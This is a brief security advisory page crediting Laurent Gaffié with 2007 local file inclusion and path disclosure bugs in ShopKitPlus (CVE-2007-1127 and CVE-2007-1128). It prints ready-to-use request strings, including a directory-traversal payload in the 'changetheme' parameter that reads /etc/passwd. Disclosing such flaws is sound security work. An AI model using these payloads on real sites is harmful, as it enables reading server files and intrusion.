Bug: shopkitplus local file include ( Ascii Version )

Search:
WLB2

shopkitplus local file include

Published
Credit
Risk
2007.02.28
laurent gaffié
Medium
CWE
CVE
Local
Remote
N/A
CVE-2007-1128
CVE-2007-1127
No
Yes

lfi:
/shopkitplus/enc/stylecss.php?changetheme=../../../../../../../../../../
../../etc/passwd

full path:
/shopkitplus/events.php?curmonth[]=01
/shopkitplus/enc/stylecss.php?changetheme[]=

regards laurent gaffié

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version